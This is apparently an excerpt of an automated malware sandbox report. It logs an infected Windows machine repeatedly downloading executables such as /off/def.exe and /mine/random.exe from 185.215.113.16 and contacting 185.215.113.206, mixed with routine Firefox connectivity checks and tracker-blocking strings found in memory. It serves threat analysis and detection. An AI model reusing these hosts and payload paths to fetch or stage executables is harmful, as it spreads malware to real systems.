Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", 